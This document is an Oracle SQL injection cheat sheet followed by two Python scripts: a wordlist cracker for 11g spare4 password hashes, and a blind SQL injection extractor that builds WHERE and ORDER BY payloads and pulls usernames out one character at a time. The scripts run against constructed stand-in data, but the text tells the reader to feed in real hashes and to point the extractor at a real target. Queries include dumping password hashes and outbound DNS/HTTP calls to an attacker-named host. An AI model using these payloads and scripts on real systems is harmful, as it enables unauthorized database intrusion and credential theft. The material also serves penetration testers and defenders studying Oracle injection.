Note: some of the queries below can only be run by an administrator; those are marked with "-- priv" at the end of the query.
Version:
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;
Comments:
SELECT 1 FROM dual -- comment
Note: an Oracle SELECT must have a FROM clause, so when you are not really querying a table you use the dummy table 'dual'.
Current user:
SELECT user FROM dual;
List users:
SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; -- priv
List password hashes:
SELECT name, password, astatus FROM sys.user$; -- priv, <= 10g. astatus tells you whether the account is locked
SELECT name, spare4 FROM sys.user$; -- priv, 11g
Password cracking:
checkpwd can crack the DES-based hashes of Oracle 8, 9 and 10.
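The 11g spare4 value listed above is not a DES hash: its "S:" segment is 40 hex characters of SHA1(password || salt) followed by 20 hex characters of the 10-byte salt, and it is case-sensitive. The following is an added example (not part of the original cheat sheet or of checkpwd) showing how to parse that segment and check candidate passwords against it; the salt, password and wordlist are constructed for the example.

```python
import hashlib
from typing import Iterable, Optional, Tuple

# Constructed sample data for this example (not a real account).
# 11g spare4 format: 'S:' + hex(SHA1(password || salt)) + hex(salt), salt = 10 bytes.
# 12c appends further ';'-separated verifiers (e.g. 'H:...', 'T:...'); they are ignored here.
SAMPLE_SALT = bytes.fromhex("0102030405060708090a")
SAMPLE_PASSWORD = "Winter2011"


def make_spare4(password: str, salt: bytes) -> str:
    """Build an 11g-style 'S:' verifier (used here only to construct test data)."""
    digest = hashlib.sha1(password.encode("utf-8") + salt).hexdigest()
    return "S:" + (digest + salt.hex()).upper()


def parse_s_verifier(spare4: str) -> Optional[Tuple[bytes, bytes]]:
    """Return (sha1_digest, salt) from the 'S:' segment of a spare4 value, or None."""
    for part in spare4.split(";"):
        if part.startswith("S:") and len(part) == 2 + 40 + 20:
            hexval = part[2:]
            return bytes.fromhex(hexval[:40]), bytes.fromhex(hexval[40:])
    return None


def check_password(spare4: str, candidate: str) -> bool:
    """True if SHA1(candidate || salt) matches the stored digest (case-sensitive)."""
    parsed = parse_s_verifier(spare4)
    if parsed is None:
        return False
    digest, salt = parsed
    return hashlib.sha1(candidate.encode("utf-8") + salt).digest() == digest


def crack(spare4: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first word in the wordlist that verifies, or None."""
    for word in wordlist:
        if check_password(spare4, word):
            return word
    return None


SAMPLE_SPARE4 = make_spare4(SAMPLE_PASSWORD, SAMPLE_SALT)

if __name__ == "__main__":
    print(SAMPLE_SPARE4)
    print(crack(SAMPLE_SPARE4, ["oracle", "Winter2011", "password"]))
```

Feed `crack()` the spare4 column from the sys.user$ query above and a real wordlist; the 10g `password` column needs a DES-based cracker such as checkpwd instead.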
List privileges:
SELECT * FROM session_privs; -- privileges of the current user
SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list the privileges of a given user
SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users holding a given privilege
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
List DBA accounts:
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list accounts that hold system privileges WITH ADMIN OPTION (i.e. DBAs)
Current database:
SELECT global_name FROM global_name;
SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM DUAL;
List databases:
SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user)
-- Other databases can be found by querying the TNS listener; see tnscmd.
List columns:
SELECT column_name FROM all_tab_columns WHERE table_name = 'BLAH';
SELECT column_name FROM all_tab_columns WHERE table_name = 'BLAH' AND owner = 'FOO';
List tables:
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
Find tables from column name:
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
-- Note: table and column names are stored in upper case (unless created with quoted identifiers), so compare against upper-case values.
Select the Nth row:
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- gets the 9th row (rows are numbered from 1)
Select the Nth character:
SELECT substr('abcd', 3, 1) FROM dual; -- gets the 3rd character, 'c'
Bitwise AND:
SELECT bitand(6,2) FROM dual; -- returns 2
SELECT bitand(6,1) FROM dual; -- returns 0
ASCII value to character:
SELECT chr(65) FROM dual; -- returns A
Character to ASCII value:
SELECT ascii('A') FROM dual; -- returns 65
Casting:
SELECT CAST(1 AS char) FROM dual;
SELECT CAST('1' AS int) FROM dual;
String concatenation:
SELECT 'A' || 'B' FROM dual; -- returns AB
IF statement:
BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END;
-- This is a PL/SQL block, so it does not work well when you can only inject into a SELECT.
CASE statement:
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2
Avoiding quotes:
SELECT chr(65) || chr(66) FROM dual; -- returns AB
Time delay:
BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, cannot be embedded in a SELECT
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse lookups are slow
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP connections are filtered or slow
-- See Heavy Queries for more time-delay techniques.
Make DNS requests:
SELECT UTL_INADDR.get_host_address('google.com') FROM dual;
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;
Command execution:
Java can be used to execute commands if it is installed on the target; see here.
ExtProc can sometimes be used too, though it normally fails for me; see here.
Local file access:
UTL_FILE can sometimes be used. Check that the following query returns something other than null:
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
Java can be used to read and write files if it is installed (it is not available in Oracle Express).
Hostname, IP address:
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; -- gets the IP address
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- gets the hostname for an IP
Location of DB files:
SELECT name FROM V$DATAFILE;
Default/system databases:
SYSTEM
SYSAUX
Extra tips:
List all table names in a single string:
select rtrim(xmlagg(xmlelement(e, table_name || ',')).extract('//text()').getstringval(), ',') from all_tables
-- Useful in a UNION injection where only one row can be used to return data.
Blind SQL injection in ORDER BY:
order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = 'a' and rownum = 1)=1) then column_name1 else column_name2 end
-- You need to know two column names of the same data type for this to work; the truth of the condition is read back from which column the rows are sorted on.
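The primitives above (Nth row via ROWNUM, substr, ascii, CASE, and the ORDER BY trick) are what a blind extraction script chains together. The following is an added example, not part of the original cheat sheet: it builds boolean payloads for a WHERE-clause injection point and for an ORDER BY injection point, and recovers usernames from all_users one character at a time with a binary search over ascii values. Because it has to run offline, the "target" is a constructed stand-in that evaluates the injected condition against a made-up user list and a hypothetical two-column table (name, price); against a real application the `ask` callback would instead send the payload and compare the HTTP response.

```python
import re
from typing import Callable

# Constructed stand-ins for the target (not real data).
FAKE_ALL_USERS = ["DBSNMP", "SYS", "SYSTEM", "WEBAPP"]
FAKE_PRODUCTS = [("Anvil", 10), ("Zebra", 1)]   # hypothetical (name, price) rows

# Nth row of all_users, sorted, using the ROWNUM trick from the cheat sheet.
ROW_QUERY = ("(SELECT username FROM (SELECT ROWNUM r, username FROM all_users "
             "ORDER BY username) WHERE r={row})")


def gt_condition(row: int, pos: int, threshold: int) -> str:
    """'ascii of character POS of row ROW is greater than THRESHOLD'. No length probe
    is needed: substr past the end is NULL, ascii(NULL) is NULL, and NULL > n is never
    true, so the per-row loop stops by itself."""
    return f"ascii(substr({ROW_QUERY.format(row=row)},{pos},1))>{threshold}"


def where_payload(cond: str) -> str:
    """Payload for a string-context WHERE injection point: CASE turns the condition into 1/0."""
    return f"' AND (SELECT CASE WHEN {cond} THEN 1 ELSE 0 END FROM dual)=1 --"


def order_by_payload(cond: str, col_true: str, col_false: str) -> str:
    """Payload for an ORDER BY injection point; both columns must share a data type."""
    return f"CASE WHEN ({cond}) THEN {col_true} ELSE {col_false} END"


def extract_char(ask: Callable[[str], bool], row: int, pos: int) -> str:
    """Binary search over 1..127 using only 'greater than' questions (at most 8 requests)."""
    if not ask(gt_condition(row, pos, 0)):
        return ""                                   # NULL: past the end of the string
    lo, hi = 1, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(gt_condition(row, pos, mid)):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_row(ask: Callable[[str], bool], row: int, max_len: int = 30) -> str:
    """Recover one row of all_users character by character."""
    out = ""
    for pos in range(1, max_len + 1):
        ch = extract_char(ask, row, pos)
        if ch == "":
            break
        out += ch
    return out


# ---- constructed stand-in for the vulnerable application -------------------
_COND_RE = re.compile(r"WHERE r=(\d+)\),(\d+),1\)\)>(\d+)")
_CASE_RE = re.compile(r"THEN (\w+) ELSE (\w+) END$")


def simulated_condition(payload: str) -> bool:
    """Evaluate the injected condition the way Oracle would, against FAKE_ALL_USERS."""
    m = _COND_RE.search(payload)
    if not m:
        return False
    row, pos, threshold = (int(x) for x in m.groups())
    users = sorted(FAKE_ALL_USERS)
    if row > len(users) or pos > len(users[row - 1]):
        return False                                # NULL comparison: CASE takes ELSE
    return ord(users[row - 1][pos - 1]) > threshold


def simulated_order_by_target(payload: str) -> str:
    """Name shown in the first row after 'ORDER BY <payload>' on FAKE_PRODUCTS."""
    col_true, col_false = _CASE_RE.search(payload).groups()
    col = col_true if simulated_condition(payload) else col_false
    idx = {"name": 0, "price": 1}[col]
    return sorted(FAKE_PRODUCTS, key=lambda r: r[idx])[0][0]


def ask_via_where(cond: str) -> bool:
    return simulated_condition(where_payload(cond))


def ask_via_order_by(cond: str) -> bool:
    # Sorted by name, Anvil comes first; sorted by price, Zebra does.
    return simulated_order_by_target(order_by_payload(cond, "name", "price")) == "Anvil"


if __name__ == "__main__":
    print([extract_row(ask_via_where, r) for r in range(1, 6)])
    print(extract_row(ask_via_order_by, 2))
```

To point this at a real target, replace `ask_via_where` (or `ask_via_order_by`) with a function that sends the payload in the injectable parameter and returns True when the response matches the "true" page; everything else stays the same.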